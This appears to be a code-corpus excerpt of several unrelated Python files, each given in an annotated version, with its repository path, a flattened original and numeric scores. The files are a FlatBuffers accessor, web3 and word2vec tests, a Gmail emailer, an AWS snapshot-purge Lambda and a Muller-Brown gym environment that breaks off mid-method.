        # vtable slot 12: inline Vector3 struct; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
        if o != 0:
            x = o + self._tab.Pos
            from .Vector3 import Vector3
            obj = Vector3()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # AvatarSimpleBody
    def AngularVelocity(self):
        # vtable slot 14: inline Vector3 struct; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
        if o != 0:
            x = o + self._tab.Pos
            from .Vector3 import Vector3
            obj = Vector3()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # AvatarSimpleBody
    def Mass(self):
        # vtable slot 16: float32 scalar; 0.0 when the field is absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(16))
        if o != 0:
            return self._tab.Get(tdw.flatbuffers.number_types.Float32Flags, o + self._tab.Pos)
        return 0.0

    # AvatarSimpleBody
    def Sleeping(self):
        # vtable slot 18: bool scalar; False when the field is absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(18))
        if o != 0:
            return bool(self._tab.Get(tdw.flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
        return False

    # AvatarSimpleBody
    def VisibleBody(self):
        # vtable slot 20: visible-body string; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(20))
        if o != 0:
            return self._tab.String(o + self._tab.Pos)
        return None


# Builder helpers: the table has 9 fields (slots 0-8), matching the accessors above.
def AvatarSimpleBodyStart(builder): builder.StartObject(9)
def AvatarSimpleBodyAddId(builder, id): builder.PrependUOffsetTRelativeSlot(0, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(id), 0)
def AvatarSimpleBodyAddPosition(builder, position): builder.PrependStructSlot(1, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(position), 0)
def AvatarSimpleBodyAddRotation(builder, rotation): builder.PrependStructSlot(2, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(rotation), 0)
def AvatarSimpleBodyAddForward(builder, forward): builder.PrependStructSlot(3, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(forward), 0)
def AvatarSimpleBodyAddVelocity(builder, velocity): builder.PrependStructSlot(4, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(velocity), 0)
def AvatarSimpleBodyAddAngularVelocity(builder, angularVelocity): builder.PrependStructSlot(5, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(angularVelocity), 0)
def AvatarSimpleBodyAddMass(builder, mass): builder.PrependFloat32Slot(6, mass, 0.0)
def AvatarSimpleBodyAddSleeping(builder, sleeping): builder.PrependBoolSlot(7, sleeping, 0)
def AvatarSimpleBodyAddVisibleBody(builder, visibleBody): builder.PrependUOffsetTRelativeSlot(8, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(visibleBody), 0)
def AvatarSimpleBodyEnd(builder): return builder.EndObject()
Python/tdw/FBOutput/AvatarSimpleBody.py
# namespace: FBOutput

# NOTE(review): this module follows the FlatBuffers-generated accessor pattern
# (vtable offset lookups, Prepend*Slot builder helpers) -- presumably emitted
# by `flatc` from a schema; prefer regenerating over hand-editing.

import tdw.flatbuffers


class AvatarSimpleBody(object):
    """Read-side accessor for the ``AvatarSimpleBody`` FlatBuffers table."""

    __slots__ = ['_tab']

    @classmethod
    def GetRootAsAvatarSimpleBody(cls, buf, offset):
        # Resolve the root table position inside ``buf`` and wrap it.
        n = tdw.flatbuffers.encode.Get(tdw.flatbuffers.packer.uoffset, buf, offset)
        x = AvatarSimpleBody()
        x.Init(buf, n + offset)
        return x

    # AvatarSimpleBody
    def Init(self, buf, pos):
        # Attach a table view over the underlying byte buffer.
        self._tab = tdw.flatbuffers.table.Table(buf, pos)

    # AvatarSimpleBody
    def Id(self):
        # vtable slot 4: avatar id string; None when the field is absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
        if o != 0:
            return self._tab.String(o + self._tab.Pos)
        return None

    # AvatarSimpleBody
    def Position(self):
        # vtable slot 6: inline Vector3 struct; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
        if o != 0:
            x = o + self._tab.Pos
            from .Vector3 import Vector3
            obj = Vector3()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # AvatarSimpleBody
    def Rotation(self):
        # vtable slot 8: inline Quaternion struct; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
        if o != 0:
            x = o + self._tab.Pos
            from .Quaternion import Quaternion
            obj = Quaternion()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # AvatarSimpleBody
    def Forward(self):
        # vtable slot 10: inline Vector3 struct; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
        if o != 0:
            x = o + self._tab.Pos
            from .Vector3 import Vector3
            obj = Vector3()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # AvatarSimpleBody
    def Velocity(self):
        # vtable slot 12: inline Vector3 struct; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
        if o != 0:
            x = o + self._tab.Pos
            from .Vector3 import Vector3
            obj = Vector3()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # AvatarSimpleBody
    def AngularVelocity(self):
        # vtable slot 14: inline Vector3 struct; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
        if o != 0:
            x = o + self._tab.Pos
            from .Vector3 import Vector3
            obj = Vector3()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # AvatarSimpleBody
    def Mass(self):
        # vtable slot 16: float32 scalar; 0.0 when the field is absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(16))
        if o != 0:
            return self._tab.Get(tdw.flatbuffers.number_types.Float32Flags, o + self._tab.Pos)
        return 0.0

    # AvatarSimpleBody
    def Sleeping(self):
        # vtable slot 18: bool scalar; False when the field is absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(18))
        if o != 0:
            return bool(self._tab.Get(tdw.flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
        return False

    # AvatarSimpleBody
    def VisibleBody(self):
        # vtable slot 20: visible-body string; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(20))
        if o != 0:
            return self._tab.String(o + self._tab.Pos)
        return None


# Builder helpers: the table has 9 fields (slots 0-8), matching the accessors above.
def AvatarSimpleBodyStart(builder): builder.StartObject(9)
def AvatarSimpleBodyAddId(builder, id): builder.PrependUOffsetTRelativeSlot(0, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(id), 0)
def AvatarSimpleBodyAddPosition(builder, position): builder.PrependStructSlot(1, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(position), 0)
def AvatarSimpleBodyAddRotation(builder, rotation): builder.PrependStructSlot(2, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(rotation), 0)
def AvatarSimpleBodyAddForward(builder, forward): builder.PrependStructSlot(3, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(forward), 0)
def AvatarSimpleBodyAddVelocity(builder, velocity): builder.PrependStructSlot(4, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(velocity), 0)
def AvatarSimpleBodyAddAngularVelocity(builder, angularVelocity): builder.PrependStructSlot(5, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(angularVelocity), 0)
def AvatarSimpleBodyAddMass(builder, mass): builder.PrependFloat32Slot(6, mass, 0.0)
def AvatarSimpleBodyAddSleeping(builder, sleeping): builder.PrependBoolSlot(7, sleeping, 0)
def AvatarSimpleBodyAddVisibleBody(builder, visibleBody): builder.PrependUOffsetTRelativeSlot(8, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(visibleBody), 0)
def AvatarSimpleBodyEnd(builder): return builder.EndObject()
0.620047
0.235366
"""Tests for web3's event-filter building helpers.

Covers topic-list normalization plus the `match_single` / `match_any`
behavior of data- and topic-argument filters, including the strict-ABI
codec's rejection of values that do not fit the declared type.
"""
import pytest
from eth_abi.exceptions import (
    ValueOutOfBounds,
)
from hypothesis import (
    given,
    strategies as st,
)

from web3._utils.events import (
    DataArgumentFilter,
    TopicArgumentFilter,
    normalize_topic_list,
)


@pytest.mark.parametrize(
    "topic_list,expected",
    (
        # Single-element sublists are unwrapped; trailing Nones are trimmed.
        (
            ("0x1", "0x2", ["0x3"], None, "0x4", None, None, None),
            ("0x1", "0x2", "0x3", None, "0x4")
        ),
        # Multi-element sublists are preserved as "match any" groups.
        (
            (None, ["0x2", "0x2a"], "0x3", None, "0x4", None, [None], None),
            (None, ["0x2", "0x2a"], "0x3", None, "0x4")
        ),
        # An all-None topic list collapses to an empty tuple.
        (
            (None, None, [None]),
            tuple()
        )
    )
)
def test_normalize_topic_list(topic_list, expected):
    assert normalize_topic_list(topic_list) == expected


@given(st.text())
def test_match_single_string_type_properties_data_arg(value):
    # Property test: any text value is accepted by a string-typed data filter.
    data_filter = DataArgumentFilter(arg_type="string")
    data_filter.match_single(value)


@given(st.text())
def test_match_single_string_type_properties_topic_arg(w3, value):
    # Property test: any text value is accepted by a string-typed topic filter.
    topic_filter = TopicArgumentFilter(arg_type="string", abi_codec=w3.codec)
    topic_filter.match_single(value)


@given(st.lists(elements=st.text(), max_size=10, min_size=0))
def test_match_any_string_type_properties(w3, values):
    # match_any records one match value per input (including the empty case).
    topic_filter = TopicArgumentFilter(arg_type="string", abi_codec=w3.codec)
    topic_filter.match_any(*values)
    assert len(topic_filter.match_values) == len(values)


@given(st.lists(elements=st.binary(), max_size=10, min_size=0))
def test_match_any_bytes_type_properties(w3, values):
    # Dynamic `bytes` accepts arbitrary binary payloads under the default codec.
    topic_filter = TopicArgumentFilter(arg_type="bytes", abi_codec=w3.codec)
    topic_filter.match_any(*values)
    assert len(topic_filter.match_values) == len(values)


@given(st.lists(elements=st.binary(), max_size=10, min_size=1))
def test_match_any_bytes_type_properties_strict(w3_strict_abi, values):
    # Same property under the strict ABI codec (non-empty lists only).
    topic_filter = TopicArgumentFilter(arg_type="bytes", abi_codec=w3_strict_abi.codec)
    topic_filter.match_any(*values)
    assert len(topic_filter.match_values) == len(values)


def test_match_hex_type_properties_strict(w3_strict_abi):
    # A correctly-sized hex string ("0x1233" is exactly 2 bytes) is accepted
    # for the fixed-size `bytes2` type under the strict codec.
    topic_filter = TopicArgumentFilter(arg_type="bytes2", abi_codec=w3_strict_abi.codec)
    topic_filter.match_any("0x1233")
    assert len(topic_filter.match_values) == 1


@pytest.mark.parametrize("values", (b"123", b"1", "0x12", "0x", "0x121212"))
def test_match_any_bytes_type_properties_strict_errors(w3_strict_abi, values):
    # Every value here is the wrong width for `bytes2`; the strict codec
    # raises only when the match values are actually encoded (lazy property).
    topic_filter = TopicArgumentFilter(arg_type="bytes2", abi_codec=w3_strict_abi.codec)
    topic_filter.match_any(values)
    with pytest.raises(ValueOutOfBounds):
        topic_filter.match_values
tests/core/utilities/test_event_filter_builder.py
import pytest from eth_abi.exceptions import ( ValueOutOfBounds, ) from hypothesis import ( given, strategies as st, ) from web3._utils.events import ( DataArgumentFilter, TopicArgumentFilter, normalize_topic_list, ) @pytest.mark.parametrize( "topic_list,expected", ( ( ("0x1", "0x2", ["0x3"], None, "0x4", None, None, None), ("0x1", "0x2", "0x3", None, "0x4") ), ( (None, ["0x2", "0x2a"], "0x3", None, "0x4", None, [None], None), (None, ["0x2", "0x2a"], "0x3", None, "0x4") ), ( (None, None, [None]), tuple() ) ) ) def test_normalize_topic_list(topic_list, expected): assert normalize_topic_list(topic_list) == expected @given(st.text()) def test_match_single_string_type_properties_data_arg(value): data_filter = DataArgumentFilter(arg_type="string") data_filter.match_single(value) @given(st.text()) def test_match_single_string_type_properties_topic_arg(w3, value): topic_filter = TopicArgumentFilter(arg_type="string", abi_codec=w3.codec) topic_filter.match_single(value) @given(st.lists(elements=st.text(), max_size=10, min_size=0)) def test_match_any_string_type_properties(w3, values): topic_filter = TopicArgumentFilter(arg_type="string", abi_codec=w3.codec) topic_filter.match_any(*values) assert len(topic_filter.match_values) == len(values) @given(st.lists(elements=st.binary(), max_size=10, min_size=0)) def test_match_any_bytes_type_properties(w3, values): topic_filter = TopicArgumentFilter(arg_type="bytes", abi_codec=w3.codec) topic_filter.match_any(*values) assert len(topic_filter.match_values) == len(values) @given(st.lists(elements=st.binary(), max_size=10, min_size=1)) def test_match_any_bytes_type_properties_strict(w3_strict_abi, values): topic_filter = TopicArgumentFilter(arg_type="bytes", abi_codec=w3_strict_abi.codec) topic_filter.match_any(*values) assert len(topic_filter.match_values) == len(values) def test_match_hex_type_properties_strict(w3_strict_abi): topic_filter = TopicArgumentFilter(arg_type="bytes2", abi_codec=w3_strict_abi.codec) 
topic_filter.match_any("0x1233") assert len(topic_filter.match_values) == 1 @pytest.mark.parametrize("values", (b"123", b"1", "0x12", "0x", "0x121212")) def test_match_any_bytes_type_properties_strict_errors(w3_strict_abi, values): topic_filter = TopicArgumentFilter(arg_type="bytes2", abi_codec=w3_strict_abi.codec) topic_filter.match_any(values) with pytest.raises(ValueOutOfBounds): topic_filter.match_values
0.501953
0.560403
import os
from unittest import TestCase
from unittest.mock import MagicMock, patch

import gensim

from word_vectorizer.models.model_data import ModelData
from word_vectorizer.models.word2vec_vectorizer import Word2VecVectorizer


class TestWord2VecVectorizer(TestCase):
    """Unit tests for Word2VecVectorizer model loading.

    KeyedVectors and get_tmpfile are patched out, so no real model file is
    read; the tests only verify how the loader is invoked for binary vs
    non-binary word2vec formats.
    """

    FOLDER_FOR_MODELS = os.path.join(os.path.dirname(os.path.realpath(
        __file__)), "testmodels")
    NAME_W2V_FILE_NON_BINARY = "test.non.binary.txt"
    NAME_W2V_FILE_BINARY = "test.binary.bin"
    PATH_TO_NON_BINARY_MODEL = os.path.join(FOLDER_FOR_MODELS,
                                            NAME_W2V_FILE_NON_BINARY)
    # BUG FIX: this was built from NAME_W2V_FILE_NON_BINARY (copy-paste), so
    # the "binary" test silently exercised the non-binary model path.
    PATH_TO_BINARY_MODEL = os.path.join(FOLDER_FOR_MODELS,
                                        NAME_W2V_FILE_BINARY)
    WORDS_IN_MODEL = ["hola", "adios"]
    SIZE_VECTORS = 4

    @patch(Word2VecVectorizer.__module__ + ".KeyedVectors")
    @patch(Word2VecVectorizer.__module__ + ".get_tmpfile")
    def test_create_model_non_binary_OK(self, mock_get_tempfile,
                                        mock_word2vec):
        """Loading a text-format model passes binary=False through."""
        mock_model_data = MagicMock(ModelData)
        mock_model_data.binary = False
        mock_word2vec.return_value = MagicMock(gensim.models.Word2Vec)

        w2v_model = Word2VecVectorizer(mock_model_data,
                                       self.PATH_TO_NON_BINARY_MODEL)

        mock_get_tempfile.assert_called_once_with(
            self.PATH_TO_NON_BINARY_MODEL)
        mock_word2vec.load_word2vec_format.assert_called_once_with(
            mock_get_tempfile.return_value, binary=mock_model_data.binary)
        self.assertEqual(mock_word2vec.load_word2vec_format.return_value,
                         w2v_model.model)

    @patch(Word2VecVectorizer.__module__ + ".KeyedVectors")
    @patch(Word2VecVectorizer.__module__ + ".get_tmpfile")
    def test_create_model_binary_OK(self, mock_get_tempfile, mock_word2vec):
        """Loading a binary-format model passes binary=True through."""
        mock_model_data = MagicMock(ModelData)
        mock_model_data.binary = True
        mock_word2vec.return_value = MagicMock(gensim.models.Word2Vec)

        w2v_model = Word2VecVectorizer(mock_model_data,
                                       self.PATH_TO_BINARY_MODEL)

        mock_get_tempfile.assert_called_once_with(
            self.PATH_TO_BINARY_MODEL)
        mock_word2vec.load_word2vec_format.assert_called_once_with(
            mock_get_tempfile.return_value, binary=mock_model_data.binary)
        self.assertEqual(mock_word2vec.load_word2vec_format.return_value,
                         w2v_model.model)
word_vectorizer/tests/unittest/models/test_word2VecVectorizer.py
import os from unittest import TestCase from unittest.mock import MagicMock, patch import gensim from word_vectorizer.models.model_data import ModelData from word_vectorizer.models.word2vec_vectorizer import Word2VecVectorizer class TestWord2VecVectorizer(TestCase): FOLDER_FOR_MODELS = os.path.join(os.path.dirname(os.path.realpath( __file__)), "testmodels") NAME_W2V_FILE_NON_BINARY = "test.non.binary.txt" NAME_W2V_FILE_BINARY = "test.binary.bin" PATH_TO_NON_BINARY_MODEL = os.path.join(FOLDER_FOR_MODELS, NAME_W2V_FILE_NON_BINARY) PATH_TO_BINARY_MODEL = os.path.join(FOLDER_FOR_MODELS, NAME_W2V_FILE_NON_BINARY) WORDS_IN_MODEL = ["hola", "adios"] SIZE_VECTORS = 4 @patch(Word2VecVectorizer.__module__ + ".KeyedVectors") @patch(Word2VecVectorizer.__module__ + ".get_tmpfile") def test_create_model_non_binary_OK(self, mock_get_tempfile, mock_word2vec): mock_model_data = MagicMock(ModelData) mock_model_data.binary = False mock_word2vec.return_value = MagicMock(gensim.models.Word2Vec) w2v_model = Word2VecVectorizer(mock_model_data, self.PATH_TO_NON_BINARY_MODEL) mock_get_tempfile.assert_called_once_with( self.PATH_TO_NON_BINARY_MODEL) mock_word2vec.load_word2vec_format.assert_called_once_with( mock_get_tempfile.return_value, binary=mock_model_data.binary) self.assertEqual(mock_word2vec.load_word2vec_format.return_value, w2v_model.model) @patch(Word2VecVectorizer.__module__ + ".KeyedVectors") @patch(Word2VecVectorizer.__module__ + ".get_tmpfile") def test_create_model_binary_OK(self, mock_get_tempfile, mock_word2vec): mock_model_data = MagicMock(ModelData) mock_model_data.binary = True mock_word2vec.return_value = MagicMock(gensim.models.Word2Vec) w2v_model = Word2VecVectorizer(mock_model_data, self.PATH_TO_BINARY_MODEL) mock_get_tempfile.assert_called_once_with( self.PATH_TO_BINARY_MODEL) mock_word2vec.load_word2vec_format.assert_called_once_with( mock_get_tempfile.return_value, binary=mock_model_data.binary) self.assertEqual(mock_word2vec.load_word2vec_format.return_value, 
w2v_model.model)
0.46952
0.273527
import smtplib
import re
# NOTE: removed `import redis` and the unused StrictRedis client in run() —
# the connection object was created but never read or written.


class Emailer:
    """Sends an email via Gmail SMTP, driven by a chat-style command string.

    Patterned from
    http://stackoverflow.com/questions/10147455/trying-to-send-email-gmail-as-mail-provider-using-python
    """

    def send_email(self, details):
        """Send one email described by *details* and return a status string.

        details is a dict with keys:
            sender     -> the email address that will send the email
            recipients -> list of email addresses the email will be sent to
            subject    -> subject of the email
            text       -> the content of the message body
            username   -> the username of the account that will send the email
            password   -> the password of the account that will send the email

        Returns 'mail sent', 'invalid username-password combination', or
        'failed to send mail' — errors are reported, never raised.
        """
        msg = """ \From: %s\nTo: %s\nSubject: %s\n\n%s """ % (
            details['sender'],
            ", ".join(details['recipients']),
            details['subject'],
            details['text'])
        try:
            # initialize an email server at gmail using smtp protocol
            server = smtplib.SMTP('smtp.gmail.com:587')
            server.ehlo()
            # put the smtp server in transport layer security mode
            server.starttls()
            # login to the email account using email-password combination
            server.login(details['username'], details['password'])
            # send the email
            server.sendmail(details['sender'], details['recipients'], msg)
            server.close()
            return 'mail sent'
        except smtplib.SMTPAuthenticationError:
            return 'invalid username-password combination'
        except Exception:
            # deliberately best-effort: report failure instead of raising
            # (was a bare `except:`; narrowed so SystemExit etc. escape)
            return 'failed to send mail'

    def run(self, input):
        """Parse a "banana emailer ..." command string and dispatch it.

        syntax: banana emailer send <sending email> <receiving email/s>
                "<subject>" "<body>" "<password>"
        """
        method_checker = re.match(r'banana\s+emailer\s+(\S*)', input)
        # BUG FIX: a non-matching command used to raise AttributeError on
        # method_checker.group(1); treat it as an unknown function instead.
        if method_checker is None:
            return 'Function not found!\n'
        response = 'default'
        if method_checker.group(1) == 'send':
            parser = re.match(
                r'banana\s+emailer\s+send\s+([^@]+@[^@]+\.[^@]+)\s+'
                r'([^@]+@[^@]+\.[^@]+)\s+"(.*)"\s+"(.*)"\s+"(.*)"',
                input)
            if parser:
                # multiple recipients arrive comma-separated in group 2
                receiving = parser.group(2).split(',')
                # BUG FIX: the password field was a corrupted placeholder
                # (<PASSWORD>(5)); it is the fifth captured group.
                details = {'sender': parser.group(1),
                           'recipients': receiving,
                           'subject': parser.group(3),
                           'text': parser.group(4),
                           'username': parser.group(1),
                           'password': parser.group(5)}
                # BUG FIX: Python 2 print statement -> print() function
                print('Please wait. Sending email.\n')
                response = self.send_email(details)
                return response
            else:
                response = 'Wrong set of Parameters!\n'
        else:
            response = 'Function not found!\n'
        return response
modules/emailer/emailer.py
import smtplib import re import redis class Emailer: """ Function description : sends an email given certain details patterned from http://stackoverflow.com/questions/10147455/trying-to-send-email-gmail-as-mail-provider-using-python Parameters: details -> a dictionary that contains user info and email ifo attributes: sender -> the email address that will send the email recipients -> a list of email addresses that the email will be sent to subject -> subject of the email text -> the content of the message body username -> the username of the account that will send the email password -> the password of the account that will send the email """ def send_email(self,details): msg = """ \From: %s\nTo: %s\nSubject: %s\n\n%s """ % (details['sender'],", ".join(details['recipients']),details['subject'],details['text']) try: #initialize an email server at gmail using smtp protocol server = smtplib.SMTP('smtp.gmail.com:587') server.ehlo() #put the smtp server in transport layer security mode server.starttls() #login to the email account using email-password combination server.login(details['username'],details['password']) #send the email server.sendmail(details['sender'],details['recipients'],msg) #server.quit() server.close() return 'mail sent' except smtplib.SMTPAuthenticationError: return 'invalid username-password combination' except: return 'failed to send mail' def run(self,input): r = redis.StrictRedis(host='localhost',port=6379,db=0) method_checker = re.match(r'banana\s+emailer\s+(\S*)',input) response = 'default' if(method_checker.group(1) == 'send'): """ syntax : banana emailer send <sending email> <receiving email/s> <subject in quotes> <body in quotes> <password in quotes> """ parser = re.match(r'banana\s+emailer\s+send\s+([^@]+@[^@]+\.[^@]+)\s+([^@]+@[^@]+\.[^@]+)\s+"(.*)"\s+"(.*)"\s+"(.*)"',input) if parser: receiving = parser.group(2).split(',') details = {'sender' : parser.group(1),'recipients' : receiving,'subject' : parser.group(3),'text' : 
parser.group(4),'username' : parser.group(1),'password' : <PASSWORD>(5)} print 'Please wait. Sending email.\n' response = self.send_email(details) return response else: response = 'Wrong set of Parameters!\n' else: response = 'Function not found!\n' return response
0.237576
0.235988
import os
import logging
import datetime
import re
import time

__author__ = '<NAME> (<EMAIL>)'
__copyright__ = 'Shine Solutions'
__license__ = 'Apache License, Version 2.0'

# setting up logger
logger = logging.getLogger(__name__)
logger.setLevel(int(os.getenv('LOG_LEVEL', logging.INFO)))


def purge_old_snapshots(params):
    """Delete completed AEM author/publish EBS snapshots older than a cutoff.

    params keys:
        SnapshotType -> 'live', 'offline' or 'orchestration' (tag filter)
        Age          -> '<n>h' | '<n>d' | '<n>w' cutoff age
        StackPrefix  -> optional; restrict to one stack, otherwise any
                        snapshot carrying a StackPrefix tag is considered

    Raises RuntimeError for an unsupported Age unit.
    """
    # imported lazily so the module can be imported (and handler input
    # validation exercised) without the AWS SDK installed
    import boto3

    filters = [
        {
            'Name': 'status',
            'Values': ['completed']
        }
    ]
    if 'StackPrefix' in params:
        filters.append({
            'Name': 'tag:StackPrefix',
            'Values': [params['StackPrefix']]
        })
    else:
        # no prefix given: match any snapshot that has a StackPrefix tag
        filters.append({
            'Name': 'tag-key',
            'Values': ['StackPrefix']
        })
    filters.append(
        {
            'Name': 'tag:SnapshotType',
            'Values': [params['SnapshotType']]
        }
    )
    filters.append(
        {
            'Name': 'tag:AemId',
            'Values': ['author', 'publish']
        }
    )

    # iterable collection of ec2.Snapshot resources
    snapshots = boto3.resource('ec2').snapshots.filter(Filters=filters)

    quantity = params['Age'][:-1]
    # BUG FIX: the handler validates Age case-insensitively (re.I), so
    # normalize the unit here; '3H' used to slip through and then raise.
    unit = params['Age'][-1].lower()
    if unit == 'd':
        delta = datetime.timedelta(days=int(quantity))
    elif unit == 'h':
        delta = datetime.timedelta(hours=int(quantity))
    elif unit == 'w':
        delta = datetime.timedelta(weeks=int(quantity))
    else:
        raise RuntimeError('Unsupported time unit')

    now = datetime.datetime.utcnow()
    # snapshot.start_time is timezone-aware; drop tzinfo to compare to utcnow()
    old_snapshots = [snapshot for snapshot in snapshots
                     if (now - snapshot.start_time.replace(tzinfo=None)) > delta]

    logger.info('Deleting {} {} snapshots older than {}'.format(
        len(old_snapshots), params['SnapshotType'], delta))
    for snapshot in old_snapshots:
        print('Deleting snapshot {}'.format(snapshot.snapshot_id))
        snapshot.delete()
        # throttle delete calls to stay under the EC2 API rate limit
        time.sleep(0.5)


def handler(event, context):
    """Lambda entry point: validate inputs, then purge old snapshots.

    Raises RuntimeError when SnapshotType or Age is missing or invalid.
    """
    if 'SnapshotType' not in event or event['SnapshotType'] not in ['live', 'offline', 'orchestration']:
        # BUG FIX: message omitted the supported 'orchestration' value
        logger.error('SnapshotType [live|offline|orchestration] must be specified')
        raise RuntimeError('\'SnapshotType\' is expected in inputs and have value of \'live\', \'offline\', or \'orchestration\'')

    if 'Age' not in event or not re.match(r'^\d+[hdw]$', event['Age'], re.I):
        # BUG FIX: message said xx[h|d|m] but the pattern accepts h, d or w
        logger.error('Age must be specified in xx[h|d|w] format')
        raise RuntimeError('\'Age\' is expected in inputs and in correct format')

    purge_old_snapshots(event)
lambda/purge_snapshots.py
import os import boto3 import logging import datetime import re import time __author__ = '<NAME> (<EMAIL>)' __copyright__ = 'Shine Solutions' __license__ = 'Apache License, Version 2.0' # setting up logger logger = logging.getLogger(__name__) logger.setLevel(int(os.getenv('LOG_LEVEL', logging.INFO))) def purge_old_snapshots(params): filters = [ { 'Name': 'status', 'Values': ['completed'] } ] if 'StackPrefix' in params: filters.append({ 'Name': 'tag:StackPrefix', 'Values': [params['StackPrefix']] }) else: filters.append({ 'Name': 'tag-key', 'Values': ['StackPrefix'] }) filters.append( { 'Name': 'tag:SnapshotType', 'Values': [params['SnapshotType']] } ) filters.append( { 'Name': 'tag:AemId', 'Values': ['author', 'publish'] } ) # snapshots is a list snapshots = boto3.resource('ec2').snapshots.filter(Filters=filters) quantity = params['Age'][:-1] unit = params['Age'][-1] if unit == 'd': delta = datetime.timedelta(days=int(quantity)) elif unit == 'h': delta = datetime.timedelta(hours=int(quantity)) elif unit == 'w': delta = datetime.timedelta(weeks=int(quantity)) else: raise RuntimeError('Unsupported time unit') now = datetime.datetime.utcnow() old_snapshots = [snapshot for snapshot in snapshots if (now - snapshot.start_time.replace(tzinfo=None)) > delta] logger.info('Deleting {} {} snapshots older than {}'.format(len(old_snapshots), params['SnapshotType'], delta)) for snapshot in old_snapshots: print(('Deleting snapshot {}'.format(snapshot.snapshot_id))) snapshot.delete() time.sleep(0.5) def handler(event, context): if 'SnapshotType' not in event or event['SnapshotType'] not in ['live', 'offline', 'orchestration']: logger.error('SnapshotType [live|offline] must be specified') raise RuntimeError('\'SnapshotType\' is expected in inputs and have value of \'live\', \'offline\', or \'orchestration\'') if 'Age' not in event or not re.match(r'^\d+[hdw]$', event['Age'], re.I): logger.error('Age must be specified in xx[h|d|m] format') raise RuntimeError('\'Age\' is expected in 
inputs and in correct format') purge_old_snapshots(event)
0.269133
0.152631
import gym
import numpy as np
import matplotlib.pyplot as plt
from itertools import product
from gym import error, spaces, utils
from gym.utils import seeding


class MullerBrownContinuousEnv(gym.Env):
    # Gym environment over the continuous Muller-Brown potential energy
    # surface: observations are (x, y) positions, actions are 2D steps,
    # reward is the energy decrease achieved by a step.
    metadata = {'render.modes': ['human']}

    def __init__(self):
        # state space: rectangular (x, y) domain of the PES
        self.x_min = -1.5
        self.x_max = 1.0
        self.y_min = -0.5
        self.y_max = 2.0
        self.observation_space = spaces.Box(low=np.array([self.x_min,self.y_min]),
            high=np.array([self.x_max,self.y_max]), dtype=float)
        # action space: each component in [-1, 1]; step() scales moves by 0.2
        self.action_min = -1
        self.action_max = 1
        self.action_space = spaces.Box(low=self.action_min,
            high=self.action_max,shape=(2,),dtype=float)
        # precompute some energies for plotting PES
        self.grid_points = 60
        self.energies = np.empty((self.grid_points,self.grid_points))
        x = np.linspace(self.x_min,self.x_max,self.grid_points)
        y = np.linspace(self.y_min,self.y_max,self.grid_points)
        for ix,iy in product(range(self.grid_points),range(self.grid_points)):
            self.energies[ix,iy] = self.energy((x[ix],y[iy]))
        self.reset()

    def plotPES(self):
        '''
        Renders the continuous Muller Brown PES (environment) as a
        pseudocolor plot and returns the matplotlib figure.
        '''
        x = np.linspace(self.x_min,self.x_max,self.grid_points)
        y = np.linspace(self.y_min,self.y_max,self.grid_points)
        fig,ax = plt.subplots()
        # energies is indexed [ix, iy]; transpose so rows map to y for pcolormesh
        im = plt.pcolormesh(x,y,self.energies.T, cmap='GnBu_r', vmax=10,shading='nearest')
        ax.set_aspect('equal')
        cbar = fig.colorbar(im, ax=ax)
        plt.xlabel('x')
        plt.ylabel('y')
        cbar.set_label('energy')
        return fig

    def render(self, mode='human'):
        # draw the PES and mark the agent's current position on top of it
        self.plotPES()
        x,y = self.agent_position
        plt.plot(x,y,marker='o',color='#C91A09',markersize=8)

    def energy(self, state):
        '''
        Muller-Brown potential energy surface: a sum of four anisotropic
        Gaussian terms with the standard published coefficients.

        Parameters:
            state : (x, y) position pair (continuous floats)
        Returns:
            energy : float
        '''
        x,y = state
        A = [-200, -100, -170, 15]
        a = [-1, -1, -6.5, 0.7]
        b = [0, 0, 11, 0.6]
        c = [-10, -10, -6.5, 0.7]
        x0 = [1, 0, -0.5, -1]
        y0 = [0, 0.5, 1.5, 1]
        energy = 0.0
        for k in range(len(x0)):
            energy += (A[k]) *\
                np.exp(a[k]*(x-x0[k])**2 +\
                b[k]*(x-x0[k])*(y-y0[k]) +\
                c[k]*(y-y0[k])**2)
        return energy

    def set_state(self, state):
        # directly place the agent at *state*; no bounds check here —
